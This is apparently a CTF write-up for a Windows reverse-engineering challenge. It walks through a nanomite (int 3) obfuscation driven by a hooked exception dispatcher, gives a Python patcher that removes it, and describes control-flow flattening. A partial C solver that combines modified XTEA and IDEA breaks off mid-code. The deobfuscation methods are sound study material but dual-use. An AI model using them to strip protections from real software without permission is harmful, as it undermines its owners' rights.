Call smelly function at 0x140001680 locating and hooking the (undocumented) KiUserExceptionDispatcher subroutine.
Ask the user for a flag of 32 bytes length.
Allocate, fill and make a buffer $f_0$ (0x140007970) executable via VirtualAlloc, memcpy and VirtualProtect.
Load and parse a list $l_0$ from 0x1400080f0 consisting of 63 integers and create a C++ map out of it.
Call $f_0$ while passing the constant string TCTF_QUALS_2020_, a pointer to a target buffer $T$ of size 208 bytes, and the constant 0x10.
Free the buffer containing $f_0$, dispose of the map object, and repeat 3. and 4. for function $f_1$ (0x140007060) and list $l_1$ (0x140008000).
Partition the flag and an array of constants $C$ (at 0x140007040) into $4 \cdot 32$ bytes, and pass pointers to a chunk of the flag and $C$ to $f_1$ together with a pointer to the buffer $T$ filled earlier by $f_0$.
Only if all four invocations of $f_1$ return 0, the binary prints Congrats, you got the flag..

Obfuscation

So far, so easy. If only $f_0$ and $f_1$ were straightforward to understand—as the KiUserExceptionDispatcher hook suggests, both functions are protected by obfuscation involing debugging exceptions:

.data:0000000140007970 55                                push    rbp
.data:0000000140007971 41 57                             push    r15
.data:0000000140007973 41 56                             push    r14
.data:0000000140007975 41 55                             push    r13
.data:0000000140007977 41 54                             push    r12
.data:0000000140007979 53                                push    rbx
.data:000000014000797A 48 85 D2                          test    rdx, rdx
.data:000000014000797D 0F 94 44 24 DA                    setz    byte ptr [rsp-26h]
.data:0000000140007982 48 85 C9                          test    rcx, rcx
.data:0000000140007985 0F 94 44 24 DB                    setz    byte ptr [rsp-25h]
.data:000000014000798A 49 83 F8 10                       cmp     r8, 10h
.data:000000014000798E B8 19 2A F8 28                    mov     eax, 28F82A19h
.data:0000000140007993 41 B9 50 2E 43 ED                 mov     r9d, 0ED432E50h
.data:0000000140007999 44 0F 45 C8                       cmovnz  r9d, eax
.data:000000014000799D 48 89 54 24 F8                    mov     [rsp-8], rdx
.data:00000001400079A2 48 8D 42 68                       lea     rax, [rdx+68h]
.data:00000001400079A6 48 89 44 24 F0                    mov     [rsp-10h], rax
.data:00000001400079AB B8 A4 91 06 BF                    mov     eax, 0BF0691A4h
.data:00000001400079B0 CC                                int     3               ; Trap to Debugger
.data:00000001400079B1
.data:00000001400079B1                   loc_1400079B1:                          ; CODE XREF: .data:00000001400079DD↓j
.data:00000001400079B1                                   db      26h
.data:00000001400079B1 26 B8 F2 4C 67 6E                 mov     eax, 6E674CF2h
.data:00000001400079B7 41 B8 FF FF FF FF                 mov     r8d, 0FFFFFFFFh
.data:00000001400079BD 0F 1F 00                          nop     dword ptr [rax]
.data:00000001400079C0 89 C2                             mov     edx, eax
.data:00000001400079C2 81 FA 72 E3 70 F9                 cmp     edx, 0F970E372h
.data:00000001400079C8 CC                                int     3               ; Trap to Debugger

Nanomites

After analyzing the code a bit it became apparent that some instructions had been replaced by the debug-exception triggering instruction int $3. Since all branches were missing from the protected code (and due to the name of the challenge “J” $\approx$ WinDbg command for conditional breakpoint as pointed out by one of our team members) we suspected conditional logic being implemented by means of the hooked KiUserExceptionDispatcher and the map object created from the list of integers in high-level steps 4. and 6. earlier. This seemed to be a obfuscation known as “nanomites” in ye Olden Days when the author of this writeup learned how to reverse all the things. Writing a small parser for the integer list and printing the entries seemed to confirm this idea:

import struct

dat = bytearray(open("j.exe", "rb").read())

ns = struct.unpack("<63I".format(num_nanos), dat[0x5f70:][:63 * 4])

for n in ns:
    cond, skip, src, tgt = n & 0xf, (n >> 30), ((n >> 4) & 0x1fff), ((n >> 17) & 0x1fff)
    print("{:#x} {:#x} {:#x} {:#x}".format(cond, skip, src, tgt))

0x0 0x0 0x40 0x50
0x1 0x0 0x58 0xa0
0x1 0x2 0x60 0xf0
0x1 0x2 0x6c 0x193
0x2 0x2 0x78 0x2f4
0x3 0x2 0x84 0x313
0x4 0x0 0x92 0x50
[...]

The values in the third column of the output and the locations of the int $3 instructions relative to the function beginning seem to match. So, we concluded, the fourth column could be the relative location of the jump target. But what are the first two values used for?

To understand this, we finally analyzed the KiUserExceptionDispatcher hook located at 0x140001490. After recovering the parameter type (a struct containing a pointer to a exception context PCONTEXT, and a pointer to an EXCEPTION_RECORD structure) this function becomes a lot more readable:

__int64 __fastcall sub_140001490(struct mystruct *a1)
{
  unsigned int v1; // er11
  __int64 base; // rbx
  PCONTEXT v3; // rdx
  __int64 v4; // rax
  __int64 v5; // rcx
  unsigned int off; // er8
  int skip; // er8
  __int64 nano_jmp_diff; // r10
  DWORD eflags; // er9
  __int64 map_ele; // [rsp+0h] [rbp-18h]

  v1 = 0;
  if ( a1->except->ExceptionCode == (unsigned int)EXCEPTION_BREAKPOINT )
  {
    base = shc_base;
    a1->ctxt->Dr0 = 0i64;
    a1->ctxt->Dr1 = 0i64;
    a1->ctxt->Dr2 = 0i64;
    a1->ctxt->Dr3 = 0i64;
    v3 = a1->ctxt;
    v4 = *(_QWORD *)(nanomites + 8);
    v5 = nanomites;
    off = LODWORD(v3->Rip) - base;
    if ( *(_BYTE *)(v4 + 25) )
      goto LABEL_9;
    do
    {
      if ( *(_DWORD *)(v4 + 28) >= off )
      {
        v5 = v4;
        v4 = *(_QWORD *)v4;
      }
      else
      {
        v4 = *(_QWORD *)(v4 + 16);
      }
    }
    while ( !*(_BYTE *)(v4 + 25) );
    if ( v5 == nanomites || (map_ele = v5, off < *(_DWORD *)(v5 + 28)) )
LABEL_9:
      map_ele = nanomites;
    if ( map_ele != nanomites )
    {
      skip = *(_DWORD *)(map_ele + 36);
      nano_jmp_diff = *(int *)(map_ele + 40);
      v1 = -1;
      if ( skip )
      {
        if ( skip == 1 )
        {
          skip = 5;
        }
        else if ( skip == 2 )
        {
          skip = 6;
        }
        else
        {
          v1 = 0;
        }
      }
      else
      {
        skip = 2;
      }
      eflags = v3->EFlags;
      if ( _bittest((const int *)&eflags, 8u) )
        v1 = 0;
      if ( *(_BYTE *)(map_ele + 32) )
      {
        switch ( *(_BYTE *)(map_ele + 32) )
        {
          case 1:
            if ( (eflags & 0x40) != 0 || ((eflags ^ (eflags >> 4)) & 0x80u) != 0 )
              goto LABEL_27;
            break;
          case 2:
            if ( (eflags & 0x40) == 0 && ((eflags ^ (eflags >> 4)) & 0x80u) == 0 )
              goto LABEL_27;
            break;
          case 3:
            if ( (eflags & 0x40) != 0 )
            {
LABEL_27:
              v3->Rip = base + nano_jmp_diff;
              return v1;
            }
            break;
          case 4:
            if ( (eflags & 0x40) == 0 )
              goto LABEL_27;
            break;
          default:
            return 0i64;
        }
        v3->Rip += skip;
        return v1;
      }
      v3->Rip = base + nano_jmp_diff;
    }
  }
  return v1;
}

To summarize, the (relative) location of the current debug exception within the protected function is looked up in the C++ map, the integer stored at map_ele + 36 is translated from the list [0, 1, 2, 3] to the corresponding entry in the list [2, 5, 6, 0], and then the value of the rflags x86-64 register (storing the result of the last comparison as part of the status flags) is evaluated according to the value stored at map_ele + 32. So, the first two columns of the small parser above are actually values controlling the conditional jump type, and the number of bytes to skip forward in case the branch is not taken. The later is a clever trick to skew analysis further, since the int $3 instructions do not just “fall through” to the next instruction, but rather a jump occurs regardless of whether the condition was false or true. Of course, the bytes directly behind each int $3 were maliciously filled with instructions that would “forwards consume” the next instructions as parts of immediates, making the obfuscated code less readable when attempting to do a linear disassembly. This technique, however, introduces a weakness that may or may not have been intended by the authors: We have enough space to replace the int $3s by the original relative jump instructions thus removing the whole obfuscation layer. The following small python script produces a clean(er) version of the obfuscated code (that is even runnable!):

#!/usr/bin/env python3

import sys
import struct

def fixup(dat, off_code, off_nanos, num_nanos):

    ns = struct.unpack("<{}I".format(num_nanos), dat[off_nanos:][:num_nanos * 4])

    for n in ns:
        cond, skip, src, tgt = n & 0xf, (n >> 30), ((n >> 4) & 0x1fff), ((n >> 17) & 0x1fff)
        print("{:#x} {:#x} {:#x} {:#x}".format(cond, skip, src, tgt))

        skip = [2, 5, 6, 0][skip]

        dat[off_code+src:off_code+src+skip] = b"\x90" * skip

        delta = tgt - (src + 2) ## jmp near is two bytes

        if abs(delta) < 0x80 and skip >= 2:
            a = [ 0xeb, 0x7e, 0x7d, 0x74, 0x75 ][cond]
            dat[off_code+src:off_code+src+2] = struct.pack("<Bb", a, delta)
            print("\x1b[32m patching jmp short\x1b[39m")
        elif skip == 5 and cond == 0:
            a = [ b"\xe9" ][cond]
            dat[off_code+src:off_code+src+5] = a + struct.pack("<i", delta - 3)
            print("\x1b[32m patching unconditional jmp near\x1b[39m")
        elif skip >= 6:
            a = [ b"\x0f\x8e", b"\x0f\x8d", b"\x0f\x84", b"\x0f\x85" ][cond - 1]
            dat[off_code+src:off_code+src+6] = a + struct.pack("<i", delta - 4)
            print("\x1b[32m patching conditional jmp near\x1b[39m")

        else:
            print("\x1b[31m not patching ... \x1b[39m")


    return dat

dat = bytearray(open("j.exe", "rb").read())

dat = fixup(dat, 0x5f70, 0x66f0, 0x3f)
dat = fixup(dat, 0x5660, 0x6600, 0x39)

dat[0x5660+0x1fe*8:0x5660+0x1fe*8+8] = struct.pack("<Q", 0x5EFFFFF009E85657)
dat[0x5660+0x7fc*2:0x5660+0x7fc*2+2] = struct.pack("<H", 0xC35F)
dat[0xb3b:0xb3b+5] = b"\x90" * 5 ## Patch out exception hook

open("j_patched.exe", "wb").write(dat)

Control Flow Flattening

Success! Now $f_0$ and $f_1$ can be disassembled (or even decompiled) to meaningful instructions! Or … well … halfway meaningful instructions, because the authors gracefully added Control Flow Flattening as another layer of obfuscation. We can happily ignore this for function $f_0$, since it only takes constants as input parameters and therefore is independent of the flag, but the actual checker implemented in $f_1$ we need to fully recover. (Not that we did not try to throw angr on it but this was a lost battle anyway, as we would learn much later that night.)

Control Flow Flattening is an obfuscation technique that conceals the order of basic block execution of a particular function and therefore slows down static analysis. It can be perceived as a switch statement wrapped into a while loop, introducing and updating a global state variable that schedules execution of the original basic blocks.

To worsen things, the authors also enabled obfuscator LLVM’s Opaque Predicates and Bogus Control Flow obfuscation techniques that add a lot of noise to the protected code. In total, the decompiled $f_1$ looked like this: (We added some annotations of basic operations in a lengthy manual procedure during the second night of the CTF.)

__int64 __fastcall sub_140007060(__int64 flag, unsigned __int8 *key, unsigned int *consts)
{
  unsigned __int16 v3; // r12
  __int16 v4; // r15
  unsigned __int16 v5; // di
  unsigned __int16 v6; // bp
  unsigned __int16 v7; // r14
  unsigned int v8; // er13
  unsigned int v9; // er10
  unsigned int rolling; // er11
  int i; // er8
  __int16 v12; // dx
  unsigned int j; // ebx
  int v14; // esi
  unsigned int v15; // et0
  int v16; // eax
  __int16 v17; // r8
  __int16 v18; // r15
  unsigned int v19; // edx
  unsigned int v20; // eax
  int v21; // eax
  __int16 v22; // dx
  int v23; // eax
  unsigned int v24; // et0
  unsigned __int16 v25; // si
  int v26; // ebp
  unsigned int v27; // et0
  int v28; // esi
  int v29; // edi
  unsigned int v30; // ebp
  unsigned int v31; // esi
  unsigned int v32; // ebp
  unsigned int v33; // et0
  int v34; // esi
  int v36; // [rsp+0h] [rbp-70h]
  unsigned __int16 v37; // [rsp+0h] [rbp-70h]
  unsigned int v38; // [rsp+0h] [rbp-70h]
  int v39; // [rsp+0h] [rbp-70h]
  unsigned int v40; // [rsp+0h] [rbp-70h]
  int v41; // [rsp+8h] [rbp-68h]
  int v42; // [rsp+8h] [rbp-68h]
  int v43; // [rsp+8h] [rbp-68h]
  int v44; // [rsp+8h] [rbp-68h]
  int v45; // [rsp+8h] [rbp-68h]
  unsigned __int16 v46; // [rsp+10h] [rbp-60h]
  unsigned __int16 *key_; // [rsp+18h] [rbp-58h]
  int v48; // [rsp+24h] [rbp-4Ch]
  int v49; // [rsp+28h] [rbp-48h]
  unsigned __int8 *v50; // [rsp+38h] [rbp-38h]

  v3 = _byteswap_ushort(*(_WORD *)flag);
  v4 = (~(*(unsigned __int8 *)(flag + 2) << 8) & 0xE99E | (*(unsigned __int8 *)(flag + 2) << 8) & 0x1600) ^ (~*(unsigned __int8 *)(flag + 3) & 0xE99E | *(_BYTE *)(flag + 3) & 0x61);
  v5 = ~*(unsigned __int8 *)(flag + 5) & 0x562A;
  v6 = (~(*(unsigned __int8 *)(flag + 4) << 8) & 0x562A | (*(unsigned __int8 *)(flag + 4) << 8) & 0xA900) ^ (v5 | *(_BYTE *)(flag + 5) & 0xD5);
  v7 = (~(*(unsigned __int8 *)(flag + 6) << 8) & 0x5089 | (*(unsigned __int8 *)(flag + 6) << 8) & 0xAF00) ^ (~*(unsigned __int8 *)(flag + 7) & 0x5089 | *(_BYTE *)(flag + 7) & 0x76);
  v8 = *consts;
  v9 = consts[1];
  v50 = key;
  rolling = 0x104D9AF0;
  for ( i = 0; ; i = v49 + 1 )
  {
    j = v3;
    v49 = i;
    key_ = (unsigned __int16 *)key;
    v41 = *(unsigned __int16 *)key;
    v36 = v41 * v3;
    v14 = -1975650526;
    do
    {
      if ( v14 != -1975650526 )
      {
        v5 = 29222 - v3 - v41 - 29221;
        goto LABEL_10;
      }
      v14 = -2017906061;
      if ( v36 )
        v14 = -946745016;
    }
    while ( v14 < -946745017 );
    while ( v14 == -946745016 )
    {
      v15 = v41 * v3;
      *(&v15 + 1) = v15;
      v5 = (((unsigned int)(*(_QWORD *)&v15 >> 16) - v36) >> 16) + 1;
LABEL_10:
      v14 = 1075691724;
    }
    v46 = v5;
    v48 = *((unsigned __int16 *)key + 1);
    v16 = 1626405068;
    if ( i < 8 )
      v16 = -41311302;
    if ( v16 != -41311302 )
      break;
    v17 = v4 + v48;
    v18 = v6 + *((_WORD *)key + 2);
    v19 = ((~(v8 >> 5) & 0x568C210F | (v8 >> 5) & 0x173DEF0) ^ (~(16 * v8) & 0x568C210F | (16 * v8) & 0xA973DEF0)) + v8;
    v20 = rolling + *(_DWORD *)&v50[4 * ((rolling >> 11) & ((rolling >> 11) ^ 0x1FFFFC))];
    v9 -= v19 & ~v20 | v20 & ~v19;
    v42 = key_[3];
    *(_DWORD *)&v37 = v42 * v7;
    v21 = -1975650526;
    do
    {
      if ( v21 != -1975650526 )
      {
        v7 = 3871 - v7 - v42 - 3870;
        goto LABEL_22;
      }
      v21 = -2017906061;
      if ( *(_DWORD *)&v37 )
        v21 = -946745016;
    }
    while ( v21 < -946745017 );
    while ( v21 == -946745016 )
    {
      *(_DWORD *)&v7 = ((((~HIWORD(*(_DWORD *)&v37) & 0x334DAD1A | HIWORD(*(_DWORD *)&v37) & 0x52E5) ^ (~(*(_DWORD *)&v37 << 16) & 0x334DAD1A | (*(_DWORD *)&v37 << 16) & 0xCCB20000))
                       - *(_DWORD *)&v37) >> 16)
                     + 1;                       // 
                                                // v7 = max(0, v37 - 1)
LABEL_22:
      v21 = 1075691724;
    }
    rolling += 0x3DF64CA2;
    *(_DWORD *)&v22 = (~v5 & 0xA212 | v5 & 0x5DED) ^ (~v18 & 0xA212 | v18 & 0x5DED);
    v43 = key_[4];
    v38 = v43 * *(_DWORD *)&v22;
    v23 = -1975650526;
    do
    {
      if ( v23 != -1975650526 )
      {
        v22 = 18749 - v22 - v43 - 18748;
        goto LABEL_31;
      }
      v23 = -2017906061;
      if ( v38 )
        v23 = -946745016;
    }
    while ( v23 < -946745017 );
    while ( v23 == -946745016 )
    {
      v24 = v38;
      *(&v24 + 1) = v38;
      *(_DWORD *)&v22 = (((unsigned int)(*(_QWORD *)&v24 >> 16) - v38) >> 16) + 1;
LABEL_31:
      v23 = 1075691724;
    }
    v8 -= (~(*(_DWORD *)&v50[4 * (rolling & (rolling ^ 0xFFFFFFFC))] + rolling) & 0x6D1A24E8 | (*(_DWORD *)&v50[4 * (rolling & (rolling ^ 0xFFFFFFFC))]
                                                                                              + rolling) & 0x92E5DB17) ^ (~(((v9 >> 5) & ~(16 * v9) | (16 * v9) & ~(v9 >> 5)) + v9) & 0x6D1A24E8 | (((v9 >> 5) & ~(16 * v9) | (16 * v9) & ~(v9 >> 5)) + v9) & 0x92E5DB17);
    v25 = v22 + ((~v7 & 0xFE0E | v7 & 0x1F1) ^ (~v17 & 0xFE0E | v17 & 0x1F1));
    v44 = key_[5];
    v39 = v44 * v25;
    v26 = -1975650526;
    do
    {
      if ( v26 != -1975650526 )
      {
        v25 = -18404 - (v22 + ((~v7 & 0xFE0E | v7 & 0x1F1) ^ (~v17 & 0xFE0E | v17 & 0x1F1))) - v44 + 18405;
        goto LABEL_40;
      }
      v26 = -2017906061;
      if ( v39 )
        v26 = -946745016;
    }
    while ( v26 < -946745017 );
    while ( v26 == -946745016 )
    {
      v27 = v44 * (unsigned __int16)(v22 + ((~v7 & 0xFE0E | v7 & 0x1F1) ^ (~v17 & 0xFE0E | v17 & 0x1F1)));
      *(&v27 + 1) = v27;
      *(_DWORD *)&v25 = (((unsigned int)(*(_QWORD *)&v27 >> 16) - v39) >> 16) + 1;
LABEL_40:
      v26 = 1075691724;
    }
    v12 = v25 + v22;
    v3 = (~v25 & 0x8EC5 | v25 & 0x713A) ^ (~v5 & 0x8EC5 | v5 & 0x713A);
    v5 = ~v12 & 0x3E72;
    v7 = (v5 | v12 & 0xC18D) ^ (~v7 & 0x3E72 | v7 & 0xC18D);
    v6 = ~v12 & v17 | ~v17 & v12;
    v4 = (~v25 & 0xA438 | v25 & 0x5BC7) ^ (~v18 & 0xA438 | v18 & 0x5BC7);
    key = (unsigned __int8 *)(key_ + 6);
  }
  v28 = v6 + v48;
  v45 = *((unsigned __int16 *)key + 3);
  v40 = v45 * v7;
  v29 = -1975650526;
  while ( v29 == -1975650526 )
  {
    v29 = -2017906061;
    if ( v40 )
      v29 = -946745016;
    if ( v29 >= -946745017 )
      goto LABEL_44;
  }
  for ( j = 1 - v7 - v45;
        ;
        j = ((((~HIWORD(v40) & 0x258A1540 | HIWORD(v40) & 0xEABF) ^ (~(v40 << 16) & 0x258A1540 | (v40 << 16) & 0xDA750000))
            - v40) >> 16)
          + 1 )
  {
    v29 = 1075691724;
LABEL_44:
    if ( v29 != -946745016 )
      break;
  }
  v30 = ((~(v46 << 8) | 0xC0CC0073) & 0xC0CC6073 | (v46 << 8) & 0x9F00) ^ (~HIBYTE(v46) & 0xC0CC6073 | HIBYTE(v46) & 0x8C);// 
                                                // v30 = ntohs(v46);
  v31 = ((~(unsigned __int16)((v28 & (v28 ^ 0xFFFF0000)) >> 8) & 0xE170 | ((v28 & (v28 ^ 0xFFFF0000)) >> 8) & 0x1E8F) ^ (~((v28 & (v28 ^ 0xFFFF0000)) << 8) & 0xE170 | ((v28 & (v28 ^ 0xFFFF0000)) << 8) & 0x1E00) | ~(~((v28 & (v28 ^ 0xFFFF0000)) << 8) | ~((v28 & (v28 ^ 0xFFFF0000)) >> 8))) << 16;// 
                                                // v31 = ntohl(v28);
  v32 = v30 & ~(v31 & ~v8 | v8 & ~v31) | (v31 & ~v8 | v8 & ~v31) & ~v30;// 
                                                // v32 = v30 ^ v31 ^ v8
  *(&v33 + 1) = ((j & (j ^ 0xFFFF0000)) << 8) & ((j & (j ^ 0xFFFF0000)) >> 8) | ((j & (j ^ 0xFFFF0000)) >> 8) ^ ((j & (j ^ 0xFFFF0000)) << 8);// 
                                                // v33 = ntohs(j);
  v33 = _byteswap_ulong((unsigned __int16)(v4 + *((_WORD *)key + 2)));
  v34 = (~(unsigned int)(*(_QWORD *)&v33 >> 16) & 0x7E3841F4 | (*(_QWORD *)&v33 >> 16) & 0x81C7BE0B) ^ (~v9 & 0x7E3841F4 | v9 & 0x81C7BE0B);
  return (~v32 & 0x996215AF | v32 & 0x669DEA50) ^ (~v34 & 0x996215AF | v34 & 0x669DEA50) | ~(~v34 | ~v32);
}

A Well-Known Tiny Block Cipher

At some point one of us recognized parts of the chaos to implement a slightly modified version of the XTEA block cipher where the initial value of the rolling sum and the delta value had been replaced by 0x104D9AF0 and 0x3df64ca2. While this felt like the last missing piece of the puzzle, we were unhappy to realize that this was only half of the solution. Decrypting the constants found in the binary with the scrambled key produced by $f_0$ did not give us our desired (and well-deserved!) flag but only some unreadable gibberish. At this point it was about midnight in our time zone and we were 44 hours into the competition, so only 4 precious hours to sort out the mess. We needed to connect the following loose ends:

The XTEA decryption only outputs bytes that clearly are not the flag.
The function $f_1$ is a checker, not a cryptor, i.e. it returns either zero or non-zero, not a transformed array.
The output of $f_0$ is 208 bytes, but XTEA only requires a buffer of 16 bytes.

A Not-So-Well-Known Not-So-Tiny Block Cipher

Knowing that modern compilers are better at optimizing code than our tired brains, we transformed the ugly hex-rays output into C code a compiler can understand, turned on optimization, fed the produced binary into Hex-Rays again and kept our fingers crossed:

__int64 __fastcall sub_140007060(unsigned __int8 *a1, unsigned __int16 *a2, unsigned int *a3)
{
  unsigned int v5; // ebx
  unsigned int v6; // er9
  unsigned __int16 *v7; // rsi
  int v8; // er8
  int v9; // edx
  int v10; // eax
  int v11; // eax
  int v12; // ecx
  unsigned int v13; // edi
  int v14; // er14
  int v15; // er8
  unsigned int v16; // er11
  int v17; // er10
  int v18; // ecx
  unsigned int v19; // eax
  int v20; // er13
  int v21; // er10
  unsigned int v22; // er10
  unsigned int v23; // er12
  int v24; // ecx
  int v25; // er12
  int v26; // er10
  unsigned int v27; // edx
  int v28; // er12
  int v29; // er10
  int v30; // er11
  unsigned int v31; // er13
  unsigned int v32; // eax
  unsigned int v33; // eax
  int v35; // [rsp+22h] [rbp-3Eh]
  int v36; // [rsp+26h] [rbp-3Ah]
  int v37; // [rsp+2Ah] [rbp-36h]
  __int64 v38; // [rsp+2Ch] [rbp-34h]

  v9 = *(unsigned __int16 *)a1;
  v5 = *a3;
  v6 = a3[1];
  v7 = a2;
  v8 = a1[3] ^ (a1[2] << 8);
  LOWORD(v9) = __ROL2__(v9, 8);
  v10 = ~a1[5];
  LOWORD(v10) = v10 & 0x562A;
  v11 = (a1[4] << 8) ^ (a1[5] & 0xD5 | v10);
  LOWORD(v11) = v11 ^ 0x562A;
  v12 = a1[7] ^ (a1[6] << 8);
  v13 = 273521392;
  while ( 1 )
  {
    v25 = *v7;
    v26 = v25 * (unsigned __int16)v9;
    if ( v26 )
    {
      LOWORD(v35) = (v25 * (unsigned int)(unsigned __int16)v9) >> 16;
      HIWORD(v35) = v25 * v9;
      v27 = ((unsigned int)(v35 - v26) >> 16) + 1;
    }
    else
    {
      v27 = 1 - v9 - v25;
    }
    v28 = v7[3];
    v29 = v7[1];
    v30 = v7[2];
    v31 = (unsigned __int16)v28 * (unsigned __int16)v12;
    if ( v7 == a2 + 48 )
      break;
    v14 = v29 + v8;
    v15 = v11 + v30;
    v16 = 1 - v12 - v28;
    v6 -= (v13 + *(_DWORD *)&a2[(v13 >> 10) & 6]) ^ (v5 + ((16 * v5) ^ (v5 >> 5)));
    if ( v31 )
      v16 = (((HIWORD(v31) ^ ((v31 << 16) & 0xCCB20000 | ~(v31 << 16) & 0x334DAD1A) ^ 0x334DAD1A) - v31) >> 16) + 1;
    v13 += 1039551650;
    v17 = v7[4];
    v18 = (unsigned __int16)(v15 ^ v27 ^ 0xA212) ^ 0xA212;
    if ( v18 * v17 )
    {
      LOWORD(v36) = (unsigned int)(v18 * v17) >> 16;
      HIWORD(v36) = v18 * v17;
      v19 = ((unsigned int)(v36 - v18 * v17) >> 16) + 1;
    }
    else
    {
      v19 = 1 - v17 - v18;
    }
    v20 = v7[5];
    v5 -= (v13 + *(_DWORD *)&a2[(2 * (_BYTE)v13) & 6]) ^ (((v6 >> 5) ^ (16 * v6)) + v6);
    v21 = v20 * (unsigned __int16)(v19 + (v16 ^ v14));
    if ( v21 )
    {
      LOWORD(v37) = (v20 * (unsigned int)(unsigned __int16)(v19 + (v16 ^ v14))) >> 16;
      HIWORD(v37) = v20 * (v19 + (v16 ^ v14));
      v22 = ((unsigned int)(v37 - v21) >> 16) + 1;
    }
    else
    {
      v22 = 1 - v20 - (v19 + (v16 ^ v14));
    }
    v9 = v22 ^ v27;
    v8 = v22 ^ v15;
    v7 += 6;
    v23 = v22 + v19;
    v11 = v14 ^ (v22 + v19);
    v24 = ~v23;
    LOWORD(v23) = v23 & 0xC18D;
    LOWORD(v24) = v24 & 0x3E72;
    v12 = v16 ^ (v23 | v24);
    LOWORD(v12) = v12 ^ 0x3E72;
  }
  v32 = v29 + (unsigned __int16)v11;
  if ( v31 )
    v12 = ((__ROL4__(v31, 16) - v31) >> 16) + 1;
  else
    LOWORD(v12) = 1 - v12 - v28;
  LODWORD(v38) = _byteswap_ulong((unsigned __int16)(v30 + v8));
  WORD2(v38) = BYTE1(v12) | (unsigned __int16)((_WORD)v12 << 8);
  v33 = (((_WORD)v27 << 8) & 0x9F00 | ~((_WORD)v27 << 8) & 0x6000 | 0xC0CC0073) ^ (BYTE1(v27) & 0x8C | ~BYTE1(v27) & 0xC0CC6073) ^ v5 ^ (((((_WORD)v32 << 8) & 0x1E00 | ~((_WORD)v32 << 8) & 0xE170) ^ ((v32 >> 8) & 0x8F | ~BYTE1(v32) & 0xE170)) << 16);
  return v33 & (*(_DWORD *)((char *)&v38 + 2) ^ v6) | v33 ^ ((*(_DWORD *)((char *)&v38 + 2) ^ v6) & 0x669DEA50 | ~(*(_DWORD *)((char *)&v38 + 2) ^ v6) & 0x996215AF) ^ 0x996215AF;
}

This seemed easier to understand. Most strikingly, there were common sub-sequences that (after some further manual deobfuscation) clearly were not part of XTEA, but that always followed the same pattern:


if (a * b) {
    c = a * b;
} else {
    c = 1 - a - b;
}

Since we knew that we would not finish coming up with a 1:1 reimplementation of the unknown part of $f_1$, we started searching the webs for this pattern. Finally, one us remembered the constant 65537 as part of the protected function $f_0$, which then one of our crypto magicians—together with the if construct above and the 208 bytes key—finally connected to the International Data Encryption Algorithm (IDEA)! This was of course 30 minutes before the end of the competition, and it took quite some effort to get our tired brains to turn up a working IDEA implementation, which we then used to decrypt the XTEA output once more, which indeed yielded the flag:

#include <stdio.h>
#include <stdint.h>
void encipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    unsigned int i;
    uint32_t v0=v[0], v1=v[1], sum=0x104D9AF0, delta=0x3DF64CA2;
    for (i=0; i < num_rounds; i++) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
        sum += delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    printf("%x %x\n", v0, v1);
    v[0]=v0; v[1]=v1;
}

#include "idea.h"

int main()

{
    unsigned char enc[] =
    {
      0x0F, 0xDA, 0x04, 0xD8, 0xD0, 0xAB, 0xF4, 0xE5, 0x3F, 0xBD,
      0x61, 0x7C, 0x6B, 0x13, 0x7C, 0xC4, 0xF9, 0xA0, 0x54, 0x33,
      0xA7, 0x60, 0x50, 0xDA, 0x20, 0xE2, 0x7E, 0xE1, 0x13, 0x0B,
      0xB2, 0x25
    };
    //const char *key = "CTFTQ_AUSL2_20_0";
    /* Already expanded for IDEA */
    const uint8_t key[] = {
        0x43, 0x54, 0x46, 0x54, 0x51, 0x5f, 0x41, 0x55,
        0x53, 0x4c, 0x32, 0x5f, 0x32, 0x30, 0x5f, 0x30,
        0xbe, 0x8c, 0xaa, 0xa2, 0x98, 0x82, 0xbe, 0xa6,
        0x60, 0x64, 0x60, 0x64, 0xa8, 0xbe, 0xa8, 0x86,
        0x05, 0x55, 0x4d, 0x31, 0xc8, 0x7c, 0xc8, 0xc0,
        0x7d, 0xc1, 0x0d, 0x51, 0x19, 0x51, 0x45, 0x7d,
        0xf9, 0x9a, 0x81, 0x91, 0x82, 0x91, 0xa2, 0xfa,
        0xa2, 0x1a, 0xfa, 0x32, 0xaa, 0x8a, 0x62, 0x0a,
        0x23, 0x03, 0xf5, 0x05, 0x35, 0x44, 0x65, 0x44,
        0x15, 0xf5, 0x14, 0x54, 0x35, 0xc5, 0x23, 0xf3,
        0x88, 0xea, 0x88, 0x6a, 0xea, 0xcb, 0xa8, 0x2a,
        0x8a, 0x29, 0xe6, 0x6b, 0x06, 0x46, 0x0b, 0x46,
        0x97, 0x11, 0x55, 0xd4, 0x53, 0x50, 0xd7, 0x14,
        0x8b, 0x48, 0xab, 0x2b, 0xad, 0xaf, 0x2a, 0x28,
        0x06, 0x46, 0x0b, 0x46, 0x3b, 0xf7, 0x76, 0xd6,
        0x58, 0xd5, 0x2f, 0xdd, 0x88, 0xea, 0x88, 0x6a,
        0xac, 0xf7, 0xcb, 0x3a, 0xec, 0xab, 0x4a, 0x2b,
        0x35, 0x44, 0x65, 0x44, 0x61, 0xb9, 0xdd, 0xfc,
        0x9e, 0xf5, 0x0f, 0x65, 0xa2, 0x1a, 0xfa, 0x32,
        0x4f, 0xc4, 0x7e, 0x6e, 0x7f, 0x6e, 0x3f, 0x12,
        0x19, 0x51, 0x45, 0x7d, 0x6a, 0x47, 0x83, 0x3e,
        0x38, 0x3f, 0xc5, 0x9a, 0x05, 0x55, 0x4d, 0x31,
        0x11, 0x6c, 0x58, 0x41, 0xa0, 0x9b, 0xbd, 0x8c,
        0x98, 0x82, 0xbe, 0xa6, 0xe7, 0x5a, 0x42, 0x73,
        0xa1, 0xcf, 0x95, 0x43, 0x53, 0x4c, 0x32, 0x5f,
        0xd4, 0xbd, 0xba, 0xab, 0xaf, 0xa0, 0x21, 0x04,
    };

    IdeaContext ctx;
    ideaInit(&ctx, (uint8_t*) "TCTF_QUALS_2020_", 16);

    //puts(enc);
    encipher(8, (uint32_t *)&enc[0x00], (uint32_t *)&key[0]);
    encipher(8, (uint32_t *)&enc[0x08], (uint32_t *)&key[0]);
    encipher(8, (uint32_t *)&enc[0x10], (uint32_t *)&key[0]);
    encipher(8, (uint32_t *)&enc[0x18], (uint32_t *)&key[0]);
    //puts(enc);

    char fl0g[0x21];
    fl0g[0x20] = 0;
    ideaDecryptBlock(&ctx, (uint8_t*)enc+0x00, fl0g+0x00);
